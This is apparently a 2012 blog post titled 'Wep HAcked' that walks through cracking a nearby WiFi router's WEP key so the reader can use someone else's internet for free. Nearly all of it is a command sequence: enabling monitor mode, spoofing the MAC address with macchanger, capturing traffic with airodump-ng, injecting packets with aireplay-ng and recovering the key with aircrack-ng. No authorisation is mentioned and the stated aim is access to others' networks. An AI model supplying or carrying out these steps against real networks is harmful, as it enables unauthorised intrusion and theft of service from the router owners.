06 January, 2012

Wep HAcked

Now you can use free Internet by hacking any of your Local WiFi Router….

For this you have to need two things….

1. BackTrack Linux

2. WiFi Enable Laptop



*******************************************************************************************

Boot into BackTrack 
and open up a Terminal now type the following command:

airmon-ng start [device]                                                                              (in the device type the name of the wireless interface file wlan0)

airmon-ng stop [device]

macchanger –mac [fake mac] [device]                                                  (fake mac=11.22.33.44.55.66 or what ever u want to set)

airmon-ng start [device]

airodump-ng [device]

Now when you see the name of the WiFi that you want to hack then press Ctrl+C to stop the scanning process…

Note down the Following things on a text editor before moving further:

1. Channel No.

2. MAC Address

3. BSSID

4.ESSID

Now on the same terminal type the following command:

airodump-ng -c [channel no.] -w [path where you want to save the file] –bssid [MAC Address] [device]

Open up another terminal at the same time and type the following command:

aireplay-ng -1 0 -a [bssid] -h [my mac address] -e [essid] [device]

Again open one more terminal and type the following command:

aireplay-ng -3 -b [bssid] -h [my mac address] [device]

Again open one more terminal and type:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h [my mac address] [device]

We are on our final step of hacking…

Open one more terminal and type the last command to get the KEY…

aircrack-ng -n 128/64 -b [bssid] [path to the filename-01.cap]

(here 128/64 is the bit encryption so you have to check what encryption is used by that Router and then choose that encryption)

Now after some time the Key will be displayed to you in some thing like:

XX:XX:XX:XX:XX:XX

Now what you have to do is just to remove the : and you will get the actual Key….

Soon I’ll include Pics to this post So that you guys can understand it more deeply….

*******************************************************************************************

Have a Nice Day Guys…

No comments:

Post a Comment